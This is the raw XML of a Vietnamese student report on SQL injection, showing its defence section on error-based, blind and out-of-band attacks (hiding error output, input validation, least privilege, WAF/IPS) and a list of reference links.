      <w:bookmarkStart w:id="36" w:name="_Toc42895625"/>
      <w:r w:rsidR="0060786F" w:rsidRPr="0060786F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1. Generic Protection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="57DADB84" w14:textId="1E213AD9" w:rsidR="0060786F" w:rsidRDefault="0060786F" w:rsidP="0060786F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:bookmarkStart w:id="37" w:name="_Toc42895626"/>
      <w:r w:rsidRPr="0060786F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Phòng chống Error-Based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="7BDB47E8" w14:textId="5C4BBF65" w:rsidR="0060786F" w:rsidRDefault="0060786F" w:rsidP="0060786F">
      <w:r>
        <w:t xml:space="preserve">                       </w:t>
      </w:r>
      <w:r w:rsidR="00A05C5B">
        <w:t xml:space="preserve">Tạo ra kênh thông báo là một cách tốt để </w:t>
      </w:r>
      <w:r w:rsidR="000C389A">
        <w:t>debug lỗi đối với một lập trình viên, nhưng nó vô tình tạo ra một lỗ hổng để các hacker khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA5FFA" w14:textId="029E8037" w:rsidR="000C389A" w:rsidRDefault="000C389A" w:rsidP="000C389A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Như vậy, việc cần làm là chặn hết các kênh báo lỗi tới phía người dùng, các log </w:t>
      </w:r>
      <w:r w:rsidR="00B1561F">
        <w:t>hệ thống để hạn chế khả năng quan sát từ phía các hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A97CEC" w14:textId="7FAFA393" w:rsidR="00B1561F" w:rsidRPr="0060786F" w:rsidRDefault="00B1561F" w:rsidP="00B1561F">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cùng với đó là việc bảo mật dữ liệu cached, </w:t>
      </w:r>
      <w:r w:rsidR="00AF5B91">
        <w:t>session,</w:t>
      </w:r>
      <w:r w:rsidR="007726AB">
        <w:t xml:space="preserve"> sử dụng các module có sẵn để tích hợp lên website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2B92B" w14:textId="3FB66E07" w:rsidR="00D1531C" w:rsidRDefault="00D1531C"/>
    <w:p w14:paraId="54A7E05A" w14:textId="4756C66B" w:rsidR="00D1531C" w:rsidRDefault="00D1531C"/>
    <w:p w14:paraId="6706DC06" w14:textId="721B0343" w:rsidR="00D1531C" w:rsidRPr="005B4E59" w:rsidRDefault="007726AB" w:rsidP="005B4E59">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:bookmarkStart w:id="38" w:name="_Toc42895627"/>
      <w:r w:rsidRPr="005B4E59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2.2. Phòng chống Blind SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="13973F44" w14:textId="79AFDA5C" w:rsidR="00D1531C" w:rsidRDefault="007726AB">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004205BD">
        <w:t>Cách tốt nhất để đối phó với dạng Blind thì hệ thống phải xử lý</w:t>
      </w:r>
      <w:r w:rsidR="000B1905">
        <w:t xml:space="preserve">, làm nhiễu loạn các kết quả TRUE/FALSE được gửi tới, có thể không thông báo hoặc </w:t>
      </w:r>
      <w:r w:rsidR="00917A35">
        <w:t>thay đổi tra</w:t>
      </w:r>
      <w:r w:rsidR="000B1905">
        <w:t xml:space="preserve"> khác nhau đối </w:t>
      </w:r>
      <w:r w:rsidR="00917A35">
        <w:t>với các truy vấn, khiến kẻ tấn công không thể xác định đâu là truy vấn đúng/sai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA1DA5" w14:textId="77777777" w:rsidR="005B4E59" w:rsidRDefault="005B4E59">
      <w:r>
        <w:tab/>
        <w:t>Giải quyết các truy vấn có yêu cầu thời gian chờ đợi, tránh các tính huống khai thác time-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004A77E2" w14:textId="77777777" w:rsidR="005B4E59" w:rsidRDefault="005B4E59"/>
    <w:p w14:paraId="6A58EA17" w14:textId="6BBE12D9" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:bookmarkStart w:id="39" w:name="_Toc42895628"/>
      <w:r w:rsidRPr="005B4E59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Phòng chống Out of Band</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="75E5ED8A" w14:textId="77777777" w:rsidR="00357678" w:rsidRPr="00357678" w:rsidRDefault="00357678" w:rsidP="00357678"/>
    <w:p w14:paraId="2A026133" w14:textId="77777777" w:rsidR="00357678" w:rsidRPr="00466FCF" w:rsidRDefault="00357678" w:rsidP="00357678">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00466FCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến nghị:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3857A5B6" w14:textId="77777777" w:rsidR="00357678" w:rsidRDefault="00357678" w:rsidP="00357678">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="2222"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:t>Xác thực đầu vào ở cả phía máy khách và máy chủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D1C33" w14:textId="77777777" w:rsidR="00357678" w:rsidRDefault="00357678" w:rsidP="00357678">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="a382"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:t>Xử lý lỗi thích hợp để tránh hiển thị thông tin lỗi chi ti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF8546" w14:textId="77777777" w:rsidR="00357678" w:rsidRDefault="00357678" w:rsidP="00357678">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="7fd9"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:t>Xem xét thiết kế kiến ​​trúc mạng và bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798C9D7" w14:textId="77777777" w:rsidR="00357678" w:rsidRDefault="00357678" w:rsidP="00357678">
      <w:r>
        <w:t xml:space="preserve">                4 . Gán tài khoản cơ sở dữ liệu cho ứng dụng dựa trên nguyên tắc tối thiểu quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83F6E0" w14:textId="77777777" w:rsidR="00357678" w:rsidRDefault="00357678" w:rsidP="00357678">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="ca39"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:t xml:space="preserve">     5. Triển khai kiểm soát bảo mật như Tường lửa ứng dụng Web (WAF) và hệ thống ngăn chặn xâm nhập (IPS) dưới dạng kiểm soát bổ sung</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A2CAEF" w14:textId="77777777" w:rsidR="00357678" w:rsidRDefault="00357678" w:rsidP="00357678">
      <w:bookmarkStart w:id="44" w:name="911b"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:t xml:space="preserve">                6.Giám sát liên tục các quá trình ứng phó sự cố bất thường và thích hợp như là mạng lưới an toàn của các điều khiển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF97E1E" w14:textId="305031AE" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="059B2865" w14:textId="2C696CA1" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="63793055" w14:textId="3B401089" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="23C72193" w14:textId="295FDB05" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="5D6227C1" w14:textId="199C0842" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="11F58A18" w14:textId="13BF8474" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="3548FF6D" w14:textId="4C7BD5A8" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="45C07ECC" w14:textId="04CD401D" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="51215082" w14:textId="061A5902" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="3BD543AB" w14:textId="7F91DBD2" w:rsidR="005B4E59" w:rsidRDefault="005B4E59" w:rsidP="005B4E59"/>
    <w:p w14:paraId="685CFF5F" w14:textId="77777777" w:rsidR="002B6576" w:rsidRDefault="002B6576" w:rsidP="007523D3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F99FC2" w14:textId="22954623" w:rsidR="00785D75" w:rsidRPr="00974A7B" w:rsidRDefault="00974A7B" w:rsidP="00974A7B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc42895629"/>
      <w:r w:rsidRPr="00974A7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="007523D3" w:rsidRPr="00974A7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tài liệu tham khảo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="79A17E7B" w14:textId="08154D61" w:rsidR="00D9653D" w:rsidRDefault="00946410" w:rsidP="00D9653D">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34463B09" w14:textId="50695B4A" w:rsidR="00946410" w:rsidRPr="00D9653D" w:rsidRDefault="00946410" w:rsidP="00946410">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1]  </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00D149E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.hacksplaining.com/prevention/sql-injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  -- Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidR="007B4743">
        <w:t>, Các phương pháp phòng tránh cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEDEA29" w14:textId="5F78B886" w:rsidR="007523D3" w:rsidRDefault="007523D3" w:rsidP="007523D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D9653D">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00946410">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00D9653D">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00946410">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:anchor="OutOfBandChannelAttacks" w:history="1">
        <w:r w:rsidR="00946410" w:rsidRPr="00D149E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/?utm_source=hacksplaining&amp;utm_medium=post&amp;utm_campaign=articlelink#OutOfBandChannelAttacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00946410">
        <w:t xml:space="preserve">  -- 3 dạng tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437B83C" w14:textId="1F675545" w:rsidR="00946410" w:rsidRDefault="00946410" w:rsidP="007523D3">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00D149E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/?utm_source=hacksplaining&amp;utm_medium=post&amp;utm_campaign=articlelink</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> – Exploit SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3EE818" w14:textId="4F632FC5" w:rsidR="00A84044" w:rsidRDefault="00A84044" w:rsidP="007523D3">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00D149E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.acunetix.com/websitesecurity/sql-injection2/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  --3 dạng tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C7481" w14:textId="438798E2" w:rsidR="00A84044" w:rsidRDefault="00A84044" w:rsidP="007523D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B60925">
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00B60925" w:rsidRPr="00D149E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.acunetix.com/websitesecurity/sql-injection/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B60925">
        <w:t xml:space="preserve">   --các dạng phòng thủ chung</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400FA5B" w14:textId="7491503E" w:rsidR="00B60925" w:rsidRDefault="00B60925" w:rsidP="007523D3"/>
    <w:p w14:paraId="05C05CE7" w14:textId="625E9D1A" w:rsidR="00B60925" w:rsidRDefault="00B60925" w:rsidP="007523D3">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:anchor="PreventingSQL" w:history="1">
        <w:r w:rsidRPr="00D149E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.netsparker.com/blog/web-security/sql-injection-vulnerability/#PreventingSQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1531C">
        <w:t>– các dạng phòng thủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0126B7" w14:textId="7D370614" w:rsidR="00946410" w:rsidRDefault="00946410" w:rsidP="007523D3"/>
    <w:p w14:paraId="42F13808" w14:textId="77777777" w:rsidR="00946410" w:rsidRPr="007523D3" w:rsidRDefault="00946410" w:rsidP="007523D3"/>
    <w:sectPr w:rsidR="00946410" w:rsidRPr="007523D3" w:rsidSect="002F65BA">
      <w:footerReference w:type="default" r:id="rId37"/>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FD97A" w14:textId="77777777" w:rsidR="00B754CF" w:rsidRDefault="00B754CF" w:rsidP="00326E4F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A07C75A" w14:textId="77777777" w:rsidR="00B754CF" w:rsidRDefault="00B754CF" w:rsidP="0032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edium-content-serif-font;Geor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6070" w14:textId="1C8C5FED" w:rsidR="00A05C5B" w:rsidRDefault="00A05C5B" w:rsidP="003122D1">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="7F12D6D4" w14:textId="77777777" w:rsidR="00A05C5B" w:rsidRDefault="00A05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718790"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="5A917FA4" w14:textId="4D47F187" w:rsidR="00A05C5B" w:rsidRDefault="00A05C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4698A" w14:textId="77777777" w:rsidR="00A05C5B" w:rsidRDefault="00A05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82463"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="4D0DE9B5" w14:textId="77777777" w:rsidR="00A05C5B" w:rsidRDefault="00A05C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BAAA8" w14:textId="77777777" w:rsidR="00A05C5B" w:rsidRDefault="00A05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93CF4" w14:textId="77777777" w:rsidR="00B754CF" w:rsidRDefault="00B754CF" w:rsidP="00326E4F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7A587ADC" w14:textId="77777777" w:rsidR="00B754CF" w:rsidRDefault="00B754CF" w:rsidP="00326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22AA" w14:textId="0901BF76" w:rsidR="00A05C5B" w:rsidRDefault="00A05C5B">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Nhập môn An toàn thông tin</w:t>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t xml:space="preserve">                                                     Tấn công SQL injection</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6DA3262A" w14:textId="77777777" w:rsidR="00A05C5B" w:rsidRDefault="00A05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F3ED2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="958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17AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4564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B630C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C208E1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8B482E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DCC88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3257A42"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DCC88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D4A3B03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37C604A4"/>
    <w:lvl w:ilvl="0" w:tplc="D1C62322">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi"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B0BD8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C0C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95064"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE9C72D4"/>
    <w:lvl w:ilvl="0" w:tplc="9D94DCD2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAns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D2353"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB46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35D8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="808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B0428"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6974FE80"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="180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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4E490A38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E2A5AF0"/>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500B7E64"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5CC5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844AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B48008EC"/>
    <w:lvl w:ilvl="0" w:tplc="3EB2B6DC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3936" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:color w:val="000000"/>
        <w:sz w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4656" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5376" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6096" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6816" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7536" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8256" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8976" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9696" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="59277198"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A32C35E"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5000" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
